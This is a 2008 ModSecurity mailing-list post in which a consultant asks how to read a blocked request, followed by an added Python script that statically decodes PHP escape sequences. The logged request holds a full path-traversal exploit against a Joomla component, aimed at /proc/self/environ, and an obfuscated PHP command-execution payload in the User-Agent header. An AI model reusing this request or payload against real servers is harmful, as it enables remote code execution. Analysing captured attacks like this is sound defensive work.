[mod-security-users] Reading the encoded user agent info
From: Albert E. W. <ae...@AB...> - 2008-09-14 20:45:49
Mod-Security has captured/blocked the attempt for a Path Traversal Attack. Here's the information from the Console:

GET /index.php?option=com_webhosting&Itemid=&mosConfig_absolute_path=/../../../../../../.. \
/../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1
Connection: close
Host: www.abs-comptech.com
User-Agent: <? $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x \
11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x \
63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; \
$x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\1 \
41\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\1 \
63h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ gl \
obal $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c \
= ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13("\n",$x0 \
c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x \
16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17 \
($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,"\x72"))){ $x0c = \
""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c \
;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?>

How do I read this?

--
Albert E. Whale, CHS CISA CISSP
Sr. Security, Network, Risk Assessment and Systems Consultant
------------------------------------------------------------------------
ABS Computer Technology, Inc. <http://www.ABS-CompTech.com> - Email, Internet and Security Consultants
SPAMZapper <http://www.Spam-Zapper.com> - No-JunkMail.com <http://www.No-JunkMail.com> - *True Spam Elimination*.
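
Added example (not part of the original message): the strings in the User-Agent use PHP double-quoted escapes, octal (\145) and hex (\x65), so they can be read by undoing the console's " \" line wraps and decoding each escape, without running any of the PHP. The function names below are this example's own, and SAMPLE is an excerpt copied from the request above.

```python
import re

# Excerpt of the User-Agent from the message above, keeping one of the
# console's " \" line wraps, which here splits the name $x11 in two.
SAMPLE = r'''$x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x \
11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x1b="\x73\x79s\x74e\x6d";
echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");'''

# PHP double-quoted escapes: \x + 1-2 hex digits, or \ + 1-3 octal digits.
ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')


def unwrap(text):
    """Remove the console's wrap markers, which can fall mid-escape or mid-name."""
    return re.sub(r' \\\s+', '', text)


def php_unescape(literal):
    """Decode octal and hex escapes in one string literal; nothing is executed."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP keeps only the low byte
    return ESCAPE.sub(repl, literal)


def decode_assignments(text):
    """Map each $name="..." assignment to its decoded string."""
    pairs = re.findall(r'\$(\w+)\s*=\s*"([^"]*)"', unwrap(text))
    return {name: php_unescape(value) for name, value in pairs}


def decode_literals(text):
    """Decode every double-quoted literal, in order of appearance."""
    return [php_unescape(v) for v in re.findall(r'"([^"]*)"', unwrap(text))]


if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE).items():
        print(f"${name} = {value!r}")
    print("last literal:", repr(decode_literals(SAMPLE)[-1]))
```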